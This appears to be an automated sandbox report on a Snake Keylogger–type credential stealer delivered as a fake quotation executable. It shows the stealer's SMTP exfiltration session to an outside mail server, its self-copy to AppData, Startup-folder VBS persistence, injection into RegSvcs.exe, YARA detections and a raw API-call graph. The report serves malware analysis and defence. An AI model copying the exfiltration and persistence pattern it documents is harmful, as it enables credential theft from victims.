Jan 14, 2025 16:57:42.009865999 CET | 49918 | 587 | 192.168.2.10 | 208.91.199.225 | MAIL FROM:<director@igakuin.com>
Jan 14, 2025 16:57:42.158483028 CET | 587 | 49918 | 208.91.199.225 | 192.168.2.10 | 250 2.1.0 Ok
Jan 14, 2025 16:57:42.159833908 CET | 49918 | 587 | 192.168.2.10 | 208.91.199.225 | RCPT TO:<director@igakuin.com>
Jan 14, 2025 16:57:42.329303980 CET | 587 | 49918 | 208.91.199.225 | 192.168.2.10 | 250 2.1.5 Ok
Jan 14, 2025 16:57:42.365375042 CET | 49918 | 587 | 192.168.2.10 | 208.91.199.225 | DATA
Jan 14, 2025 16:57:42.512981892 CET | 587 | 49918 | 208.91.199.225 | 192.168.2.10 | 354 End data with <CR><LF>.<CR><LF>
Jan 14, 2025 16:57:42.523802042 CET | 49918 | 587 | 192.168.2.10 | 208.91.199.225 | .
Jan 14, 2025 16:57:42.869824886 CET | 587 | 49918 | 208.91.199.225 | 192.168.2.10 | 250 2.0.0 Ok: queued as 4013E64018B
Jan 14, 2025 16:57:55.498307943 CET | 587 | 50011 | 208.91.199.225 | 192.168.2.10 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 14, 2025 16:57:55.498743057 CET | 50011 | 587 | 192.168.2.10 | 208.91.199.225 | EHLO 305090
Jan 14, 2025 16:57:55.753878117 CET | 587 | 50011 | 208.91.199.225 | 192.168.2.10 | 250-us2.outbound.mailhostbox.com
  250-PIPELINING
  250-SIZE 41648128
  250-VRFY
  250-ETRN
  250-STARTTLS
  250-AUTH PLAIN LOGIN
  250-AUTH=PLAIN LOGIN
  250-ENHANCEDSTATUSCODES
  250-8BITMIME
  250-DSN
  250 CHUNKING
Jan 14, 2025 16:57:55.754164934 CET | 50011 | 587 | 192.168.2.10 | 208.91.199.225 | AUTH login ZGlyZWN0b3JAaWdha3Vpbi5jb20=
Jan 14, 2025 16:57:55.909369946 CET | 587 | 50011 | 208.91.199.225 | 192.168.2.10 | 334 UGFzc3dvcmQ6
Jan 14, 2025 16:57:56.066633940 CET | 587 | 50011 | 208.91.199.225 | 192.168.2.10 | 235 2.7.0 Authentication successful
Jan 14, 2025 16:57:56.067053080 CET | 50011 | 587 | 192.168.2.10 | 208.91.199.225 | MAIL FROM:<director@igakuin.com>
Jan 14, 2025 16:57:56.215243101 CET | 587 | 50011 | 208.91.199.225 | 192.168.2.10 | 250 2.1.0 Ok
Jan 14, 2025 16:57:56.216193914 CET | 50011 | 587 | 192.168.2.10 | 208.91.199.225 | RCPT TO:<director@igakuin.com>
Jan 14, 2025 16:57:56.388755083 CET | 587 | 50011 | 208.91.199.225 | 192.168.2.10 | 250 2.1.5 Ok
Jan 14, 2025 16:57:56.393136978 CET | 50011 | 587 | 192.168.2.10 | 208.91.199.225 | DATA
Jan 14, 2025 16:57:56.540721893 CET | 587 | 50011 | 208.91.199.225 | 192.168.2.10 | 354 End data with <CR><LF>.<CR><LF>
Jan 14, 2025 16:57:56.551393986 CET | 50011 | 587 | 192.168.2.10 | 208.91.199.225 | .
Jan 14, 2025 16:57:56.897588968 CET | 587 | 50011 | 208.91.199.225 | 192.168.2.10 | 250 2.0.0 Ok: queued as 4E42464003C


Target ID: 1
Start time: 10:57:10
Start date: 14/01/2025
Path: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe"
Imagebase: 0xf10000
File size: 1'586'688 bytes
MD5 hash: F8410BCD14256D6D355D7076A78C074F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 10:57:11
Start date: 14/01/2025
Path: C:\Users\user\AppData\Local\supergroup\ageless.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe"
Imagebase: 0xd60000
File size: 1'586'688 bytes
MD5 hash: F8410BCD14256D6D355D7076A78C074F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
• Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.1380132205.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 39%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 3
Start time: 10:57:13
Start date: 14/01/2025
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe"
Imagebase: 0x4c0000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.2594898580.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.2611160055.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false

Target ID: 5
Start time: 10:57:24
Start date: 14/01/2025
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs"
Imagebase: 0x7ff7cf1e0000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 10:57:31
Start date: 14/01/2025
Path: C:\Users\user\AppData\Local\supergroup\ageless.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\supergroup\ageless.exe"
Imagebase: 0xd60000
File size: 1'586'688 bytes
MD5 hash: F8410BCD14256D6D355D7076A78C074F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
• Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000008.00000002.1572706188.0000000000C60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

                                                                                                                  Target ID:9
                                                                                                                  Start time:10:57:32
                                                                                                                  Start date:14/01/2025
                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\supergroup\ageless.exe"
                                                                                                                  Imagebase:0x8f0000
                                                                                                                  File size:45'984 bytes
                                                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.2610745756.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false


                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:2.4%
                                                                                                                    Dynamic/Decrypted Code Coverage:1.1%
                                                                                                                    Signature Coverage:3.3%
                                                                                                                    Total number of Nodes:1652
                                                                                                                    Total number of Limit Nodes:30
                                                                                                                    execution_graph: node and edge listing of the rendered Execution Graph (interactive graph data for the process above; not reproduced as text)
97072->97044 97268 f97f59 97073->97268 97075 f9959b 97075->97044 97077 f16246 CloseHandle 97076->97077 97078 f1621e 97077->97078 97079 f16246 CloseHandle 97078->97079 97080 f1622d messages 97079->97080 97080->97044 97082 f17510 53 API calls 97081->97082 97083 f8f126 97082->97083 97388 f19e90 97083->97388 97085 f8f136 97086 f8f15b 97085->97086 97087 f1ec40 207 API calls 97085->97087 97089 f8f15f 97086->97089 97416 f19c6e 22 API calls 97086->97416 97087->97086 97089->97044 97091 f1a961 22 API calls 97090->97091 97092 f9e21b 97091->97092 97093 f17510 53 API calls 97092->97093 97094 f9e22a 97093->97094 97095 f16270 22 API calls 97094->97095 97096 f9e23d 97095->97096 97097 f17510 53 API calls 97096->97097 97098 f9e24a 97097->97098 97099 f9e262 97098->97099 97100 f9e2c7 97098->97100 97451 f1b567 39 API calls 97099->97451 97101 f17510 53 API calls 97100->97101 97103 f9e2cc 97101->97103 97105 f9e2d9 97103->97105 97106 f9e314 97103->97106 97104 f9e267 97104->97105 97108 f9e280 97104->97108 97454 f19c6e 22 API calls 97105->97454 97114 f9e32c 97106->97114 97455 f1b567 39 API calls 97106->97455 97452 f16d25 22 API calls __fread_nolock 97108->97452 97112 f1a8c7 22 API calls 97116 f9e35f 97112->97116 97113 f9e28d 97117 f16350 22 API calls 97113->97117 97115 f9e345 97114->97115 97456 f1b567 39 API calls 97114->97456 97115->97112 97432 f792c8 97116->97432 97119 f9e29b 97117->97119 97453 f16d25 22 API calls __fread_nolock 97119->97453 97121 f9e2b4 97122 f16350 22 API calls 97121->97122 97123 f9e2c2 97122->97123 97457 f162b5 22 API calls 97123->97457 97124 f9e2e6 97124->97044 97127 f16250 97126->97127 97128 f1625f 97126->97128 97127->97044 97128->97127 97129 f16264 CloseHandle 97128->97129 97129->97127 97131 f87469 97130->97131 97132 f87474 97130->97132 97469 f1b567 39 API calls 97131->97469 97135 f1a961 22 API calls 97132->97135 97173 f87554 97132->97173 97134 f2fddb 22 API calls 97136 f87587 97134->97136 97137 f87495 97135->97137 97138 f2fe0b 22 API calls 97136->97138 97140 f1a961 
22 API calls 97137->97140 97139 f87598 97138->97139 97141 f16246 CloseHandle 97139->97141 97142 f8749e 97140->97142 97143 f875a3 97141->97143 97144 f17510 53 API calls 97142->97144 97145 f1a961 22 API calls 97143->97145 97146 f874aa 97144->97146 97147 f875ab 97145->97147 97470 f1525f 22 API calls 97146->97470 97150 f16246 CloseHandle 97147->97150 97149 f874bf 97151 f16350 22 API calls 97149->97151 97152 f875b2 97150->97152 97153 f874f2 97151->97153 97154 f17510 53 API calls 97152->97154 97155 f8754a 97153->97155 97471 f7d4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 97153->97471 97156 f875be 97154->97156 97473 f1b567 39 API calls 97155->97473 97158 f16246 CloseHandle 97156->97158 97161 f875c8 97158->97161 97160 f87502 97160->97155 97162 f87506 97160->97162 97461 f15745 97161->97461 97163 f19cb3 22 API calls 97162->97163 97165 f87513 97163->97165 97472 f7d2c1 26 API calls 97165->97472 97168 f875ea 97474 f153de 27 API calls messages 97168->97474 97169 f876de GetLastError 97170 f876f7 97169->97170 97172 f16216 CloseHandle 97170->97172 97184 f876a4 97172->97184 97173->97134 97173->97184 97174 f875f8 97475 f153c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97174->97475 97175 f8751c 97175->97155 97177 f87645 97178 f2fddb 22 API calls 97177->97178 97180 f87679 97178->97180 97179 f875ff 97179->97177 97476 f7ccff 97179->97476 97181 f1a961 22 API calls 97180->97181 97183 f87686 97181->97183 97183->97184 97480 f7417d 22 API calls __fread_nolock 97183->97480 97184->97044 97483 f898e3 97186->97483 97188 f883ea 97188->97044 97190 f970db 97189->97190 97191 f970f5 97189->97191 97555 f8359c 82 API calls __wsopen_s 97190->97555 97544 f95689 97191->97544 97195 f1ec40 206 API calls 97196 f97164 97195->97196 97197 f971ff 97196->97197 97201 f971a6 97196->97201 97212 f970ed 97196->97212 97198 f97253 97197->97198 97199 f97205 97197->97199 97200 f17510 53 API calls 97198->97200 97198->97212 97556 f81119 22 API calls 97199->97556 97202 f97265 97200->97202 97206 f80acc 22 
API calls 97201->97206 97204 f1aec9 22 API calls 97202->97204 97207 f97289 CharUpperBuffW 97204->97207 97205 f97228 97557 f1a673 22 API calls 97205->97557 97209 f971de 97206->97209 97213 f972a3 97207->97213 97210 f21310 206 API calls 97209->97210 97210->97212 97211 f97230 97558 f1bf40 207 API calls 2 library calls 97211->97558 97212->97004 97214 f972aa 97213->97214 97215 f972f6 97213->97215 97551 f80acc 97214->97551 97216 f17510 53 API calls 97215->97216 97218 f972fe 97216->97218 97559 f2e300 23 API calls 97218->97559 97222 f21310 206 API calls 97222->97212 97223 f97308 97223->97212 97224 f17510 53 API calls 97223->97224 97225 f97323 97224->97225 97560 f1a673 22 API calls 97225->97560 97227 f97333 97561 f1bf40 207 API calls 2 library calls 97227->97561 97232 f1ec76 messages 97229->97232 97230 f300a3 29 API calls pre_c_initialization 97230->97232 97231 f64beb 97568 f8359c 82 API calls __wsopen_s 97231->97568 97232->97230 97232->97231 97233 f1fef7 97232->97233 97235 f1ed9d messages 97232->97235 97237 f1f3ae messages 97232->97237 97238 f2fddb 22 API calls 97232->97238 97239 f64600 97232->97239 97240 f64b0b 97232->97240 97241 f1a8c7 22 API calls 97232->97241 97247 f30242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97232->97247 97248 f1a961 22 API calls 97232->97248 97249 f1fbe3 97232->97249 97252 f301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97232->97252 97563 f201e0 207 API calls 2 library calls 97232->97563 97564 f206a0 41 API calls messages 97232->97564 97233->97235 97243 f1a8c7 22 API calls 97233->97243 97235->97038 97237->97235 97565 f8359c 82 API calls __wsopen_s 97237->97565 97238->97232 97239->97235 97245 f1a8c7 22 API calls 97239->97245 97566 f8359c 82 API calls __wsopen_s 97240->97566 97241->97232 97243->97235 97245->97235 97247->97232 97248->97232 97249->97235 97249->97237 97250 f64bdc 97249->97250 97567 f8359c 82 API calls __wsopen_s 97250->97567 
97252->97232 97253->97045 97254->97006 97255->97008 97256->97018 97257->97031 97258->97031 97259->97044 97260->97044 97261->97044 97262->97039 97263->97044 97264->97067 97265->97068 97266->97069 97267->97072 97306 f17510 97268->97306 97272 f98281 97273 f9844f 97272->97273 97278 f9828f 97272->97278 97370 f98ee4 60 API calls 97273->97370 97276 f9845e 97277 f9846a 97276->97277 97276->97278 97293 f97fd5 messages 97277->97293 97342 f97e86 97278->97342 97279 f17510 53 API calls 97295 f98049 97279->97295 97284 f982c8 97357 f2fc70 97284->97357 97287 f982e8 97363 f8359c 82 API calls __wsopen_s 97287->97363 97288 f98302 97364 f163eb 22 API calls 97288->97364 97291 f982f3 GetCurrentProcess TerminateProcess 97291->97288 97292 f98311 97365 f16a50 22 API calls 97292->97365 97293->97075 97295->97272 97295->97279 97295->97293 97361 f7417d 22 API calls __fread_nolock 97295->97361 97362 f9851d 42 API calls _strftime 97295->97362 97296 f9832a 97304 f98352 97296->97304 97366 f204f0 22 API calls 97296->97366 97298 f984c5 97298->97293 97302 f984d9 FreeLibrary 97298->97302 97299 f98341 97367 f98b7b 75 API calls 97299->97367 97302->97293 97304->97298 97368 f204f0 22 API calls 97304->97368 97369 f1aceb 23 API calls messages 97304->97369 97371 f98b7b 75 API calls 97304->97371 97307 f17525 97306->97307 97323 f17522 97306->97323 97308 f1755b 97307->97308 97309 f1752d 97307->97309 97312 f1756d 97308->97312 97317 f5500f 97308->97317 97320 f550f6 97308->97320 97372 f351c6 26 API calls 97309->97372 97373 f2fb21 51 API calls 97312->97373 97313 f5510e 97313->97313 97315 f2fddb 22 API calls 97319 f17547 97315->97319 97316 f1753d 97316->97315 97322 f2fe0b 22 API calls 97317->97322 97324 f55088 97317->97324 97321 f19cb3 22 API calls 97319->97321 97375 f35183 26 API calls 97320->97375 97321->97323 97325 f55058 97322->97325 97323->97293 97329 f98cd3 97323->97329 97374 f2fb21 51 API calls 97324->97374 97326 f2fddb 22 API calls 97325->97326 97327 f5507f 97326->97327 97328 f19cb3 22 API calls 97327->97328 
97328->97324 97330 f1aec9 22 API calls 97329->97330 97331 f98cee CharLowerBuffW 97330->97331 97376 f78e54 97331->97376 97335 f1a961 22 API calls 97336 f98d2a 97335->97336 97383 f16d25 22 API calls __fread_nolock 97336->97383 97338 f98d3e 97339 f193b2 22 API calls 97338->97339 97341 f98d48 _wcslen 97339->97341 97340 f98e5e _wcslen 97340->97295 97341->97340 97384 f9851d 42 API calls _strftime 97341->97384 97343 f97eec 97342->97343 97344 f97ea1 97342->97344 97348 f99096 97343->97348 97345 f2fe0b 22 API calls 97344->97345 97346 f97ec3 97345->97346 97346->97343 97347 f2fddb 22 API calls 97346->97347 97347->97346 97349 f992ab messages 97348->97349 97354 f990ba _strcat _wcslen 97348->97354 97349->97284 97350 f1b567 39 API calls 97350->97354 97351 f1b38f 39 API calls 97351->97354 97352 f1b6b5 39 API calls 97352->97354 97353 f17510 53 API calls 97353->97354 97354->97349 97354->97350 97354->97351 97354->97352 97354->97353 97355 f3ea0c 21 API calls ___std_exception_copy 97354->97355 97387 f7efae 24 API calls _wcslen 97354->97387 97355->97354 97358 f2fc85 97357->97358 97359 f2fd1d VirtualProtect 97358->97359 97360 f2fceb 97358->97360 97359->97360 97360->97287 97360->97288 97361->97295 97362->97295 97363->97291 97364->97292 97365->97296 97366->97299 97367->97304 97368->97304 97369->97304 97370->97276 97371->97304 97372->97316 97373->97316 97374->97320 97375->97313 97378 f78e74 _wcslen 97376->97378 97377 f78f63 97377->97335 97377->97341 97378->97377 97379 f78f68 97378->97379 97380 f78ea9 97378->97380 97379->97377 97386 f2ce60 41 API calls 97379->97386 97380->97377 97385 f2ce60 41 API calls 97380->97385 97383->97338 97384->97340 97385->97380 97386->97379 97387->97354 97389 f16270 22 API calls 97388->97389 97414 f19eb5 97389->97414 97390 f19fd2 97418 f1a4a1 97390->97418 97392 f19fec 97392->97085 97395 f5f7c4 97430 f796e2 84 API calls __wsopen_s 97395->97430 97396 f5f699 97402 f2fddb 22 API calls 97396->97402 97397 f1a405 97397->97392 97431 f796e2 84 API calls __wsopen_s 
97397->97431 97401 f1a6c3 22 API calls 97401->97414 97404 f5f754 97402->97404 97403 f5f7d2 97405 f1a4a1 22 API calls 97403->97405 97407 f2fe0b 22 API calls 97404->97407 97406 f5f7e8 97405->97406 97406->97392 97408 f1a12c __fread_nolock 97407->97408 97408->97395 97408->97397 97410 f1a587 22 API calls 97410->97414 97411 f1aec9 22 API calls 97412 f1a0db CharUpperBuffW 97411->97412 97426 f1a673 22 API calls 97412->97426 97414->97390 97414->97395 97414->97396 97414->97397 97414->97401 97414->97408 97414->97410 97414->97411 97415 f1a4a1 22 API calls 97414->97415 97417 f14573 41 API calls _wcslen 97414->97417 97427 f148c8 23 API calls 97414->97427 97428 f149bd 22 API calls __fread_nolock 97414->97428 97429 f1a673 22 API calls 97414->97429 97415->97414 97416->97089 97417->97414 97419 f1a52b 97418->97419 97425 f1a4b1 __fread_nolock 97418->97425 97421 f2fe0b 22 API calls 97419->97421 97420 f2fddb 22 API calls 97422 f1a4b8 97420->97422 97421->97425 97423 f2fddb 22 API calls 97422->97423 97424 f1a4d6 97422->97424 97423->97424 97424->97392 97425->97420 97426->97414 97427->97414 97428->97414 97429->97414 97430->97403 97431->97392 97433 f1a961 22 API calls 97432->97433 97434 f792de 97433->97434 97435 f16270 22 API calls 97434->97435 97436 f792f2 97435->97436 97437 f78e54 41 API calls 97436->97437 97443 f79314 97436->97443 97438 f7930e 97437->97438 97438->97443 97458 f16d25 22 API calls __fread_nolock 97438->97458 97439 f78e54 41 API calls 97439->97443 97442 f16350 22 API calls 97442->97443 97443->97439 97443->97442 97444 f793b3 97443->97444 97446 f79397 97443->97446 97459 f16d25 22 API calls __fread_nolock 97443->97459 97445 f1a8c7 22 API calls 97444->97445 97447 f793c2 97444->97447 97445->97447 97460 f16d25 22 API calls __fread_nolock 97446->97460 97447->97123 97449 f793a7 97450 f16350 22 API calls 97449->97450 97450->97444 97451->97104 97452->97113 97453->97121 97454->97124 97455->97114 97456->97115 97457->97124 97458->97443 97459->97443 97460->97449 97462 f54035 97461->97462 
97463 f1575c CreateFileW 97461->97463 97464 f1577b 97462->97464 97465 f5403b CreateFileW 97462->97465 97463->97464 97464->97168 97464->97169 97465->97464 97466 f54063 97465->97466 97481 f154c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97466->97481 97468 f5406e 97468->97464 97469->97132 97470->97149 97471->97160 97472->97175 97473->97173 97474->97174 97475->97179 97477 f7cd0e 97476->97477 97478 f7cd19 WriteFile 97476->97478 97482 f7cc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97477->97482 97478->97177 97480->97184 97481->97468 97482->97478 97484 f899e8 97483->97484 97485 f89902 97483->97485 97540 f89caa 39 API calls 97484->97540 97486 f2fddb 22 API calls 97485->97486 97488 f89909 97486->97488 97489 f2fe0b 22 API calls 97488->97489 97490 f8991a 97489->97490 97493 f16246 CloseHandle 97490->97493 97491 f899a2 97492 f89ac5 97491->97492 97496 f899ca 97491->97496 97499 f89a33 97491->97499 97534 f81e96 97492->97534 97495 f89925 97493->97495 97498 f1a961 22 API calls 97495->97498 97496->97188 97497 f89acc 97503 f7ccff 4 API calls 97497->97503 97500 f8992d 97498->97500 97501 f17510 53 API calls 97499->97501 97502 f16246 CloseHandle 97500->97502 97512 f89a3a 97501->97512 97504 f89934 97502->97504 97528 f89aa8 97503->97528 97505 f17510 53 API calls 97504->97505 97507 f89940 97505->97507 97506 f89abb 97542 f7cd57 30 API calls 97506->97542 97510 f16246 CloseHandle 97507->97510 97508 f89a6e 97511 f16270 22 API calls 97508->97511 97513 f8994a 97510->97513 97514 f89a7e 97511->97514 97512->97506 97512->97508 97516 f15745 5 API calls 97513->97516 97517 f89a8e 97514->97517 97521 f1a8c7 22 API calls 97514->97521 97515 f16246 CloseHandle 97518 f89b1e 97515->97518 97520 f89959 97516->97520 97522 f133c6 22 API calls 97517->97522 97519 f16216 CloseHandle 97518->97519 97519->97496 97523 f8995d 97520->97523 97524 f899c2 97520->97524 97521->97517 97525 f89a9c 97522->97525 97538 f153de 27 API calls messages 97523->97538 97526 f16216 CloseHandle 97524->97526 97541 f7cd57 30 
API calls 97525->97541 97526->97496 97528->97496 97528->97515 97530 f8996b 97539 f153c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97530->97539 97532 f89972 97532->97491 97533 f7ccff 4 API calls 97532->97533 97533->97491 97535 f81e9f 97534->97535 97537 f81ea4 97534->97537 97543 f80f67 24 API calls __fread_nolock 97535->97543 97537->97497 97538->97530 97539->97532 97540->97491 97541->97528 97542->97528 97543->97537 97545 f956a4 97544->97545 97550 f956f2 97544->97550 97546 f2fe0b 22 API calls 97545->97546 97548 f956c6 97546->97548 97547 f2fddb 22 API calls 97547->97548 97548->97547 97548->97550 97562 f80a59 22 API calls 97548->97562 97550->97195 97552 f80ada 97551->97552 97554 f80b13 97551->97554 97553 f2fddb 22 API calls 97552->97553 97552->97554 97553->97554 97554->97222 97555->97212 97556->97205 97557->97211 97558->97212 97559->97223 97560->97227 97561->97212 97562->97548 97563->97232 97564->97232 97565->97235 97566->97235 97567->97231 97568->97235 97569 f52ba5 97570 f12b25 97569->97570 97571 f52baf 97569->97571 97597 f12b83 7 API calls 97570->97597 97573 f13a5a 24 API calls 97571->97573 97574 f52bb8 97573->97574 97576 f19cb3 22 API calls 97574->97576 97579 f52bc6 97576->97579 97578 f12b2f 97582 f13837 49 API calls 97578->97582 97585 f12b44 97578->97585 97580 f52bf5 97579->97580 97581 f52bce 97579->97581 97584 f133c6 22 API calls 97580->97584 97583 f133c6 22 API calls 97581->97583 97582->97585 97586 f52bd9 97583->97586 97587 f52bf1 GetForegroundWindow ShellExecuteW 97584->97587 97588 f12b5f 97585->97588 97601 f130f2 Shell_NotifyIconW ___scrt_fastfail 97585->97601 97589 f16350 22 API calls 97586->97589 97593 f52c26 97587->97593 97595 f12b66 SetCurrentDirectoryW 97588->97595 97592 f52be7 97589->97592 97594 f133c6 22 API calls 97592->97594 97593->97588 97594->97587 97596 f12b7a 97595->97596 97602 f12cd4 7 API calls 97597->97602 97599 f12b2a 97600 f12c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97599->97600 97600->97578 97601->97588 97602->97599 
97603 f12de3 97604 f12df0 __wsopen_s 97603->97604 97605 f12e09 97604->97605 97606 f52c2b ___scrt_fastfail 97604->97606 97607 f13aa2 23 API calls 97605->97607 97608 f52c47 GetOpenFileNameW 97606->97608 97609 f12e12 97607->97609 97610 f52c96 97608->97610 97619 f12da5 97609->97619 97612 f16b57 22 API calls 97610->97612 97614 f52cab 97612->97614 97614->97614 97616 f12e27 97637 f144a8 97616->97637 97620 f51f50 __wsopen_s 97619->97620 97621 f12db2 GetLongPathNameW 97620->97621 97622 f16b57 22 API calls 97621->97622 97623 f12dda 97622->97623 97624 f13598 97623->97624 97625 f1a961 22 API calls 97624->97625 97626 f135aa 97625->97626 97627 f13aa2 23 API calls 97626->97627 97628 f135b5 97627->97628 97629 f135c0 97628->97629 97630 f532eb 97628->97630 97632 f1515f 22 API calls 97629->97632 97635 f5330d 97630->97635 97673 f2ce60 41 API calls 97630->97673 97633 f135cc 97632->97633 97667 f135f3 97633->97667 97636 f135df 97636->97616 97638 f14ecb 94 API calls 97637->97638 97639 f144cd 97638->97639 97640 f53833 97639->97640 97642 f14ecb 94 API calls 97639->97642 97641 f82cf9 80 API calls 97640->97641 97643 f53848 97641->97643 97644 f144e1 97642->97644 97645 f5384c 97643->97645 97646 f53869 97643->97646 97644->97640 97647 f144e9 97644->97647 97648 f14f39 68 API calls 97645->97648 97649 f2fe0b 22 API calls 97646->97649 97650 f53854 97647->97650 97651 f144f5 97647->97651 97648->97650 97658 f538ae 97649->97658 97690 f7da5a 82 API calls 97650->97690 97689 f1940c 136 API calls 2 library calls 97651->97689 97654 f12e31 97655 f53862 97655->97646 97656 f53a5f 97660 f53a67 97656->97660 97657 f14f39 68 API calls 97657->97660 97658->97656 97659 f1a4a1 22 API calls 97658->97659 97658->97660 97664 f19cb3 22 API calls 97658->97664 97674 f7967e 97658->97674 97677 f80b5a 97658->97677 97683 f13ff7 97658->97683 97691 f795ad 42 API calls _wcslen 97658->97691 97659->97658 97660->97657 97692 f7989b 82 API calls __wsopen_s 97660->97692 97664->97658 97668 f13605 97667->97668 97672 f13624 __fread_nolock 
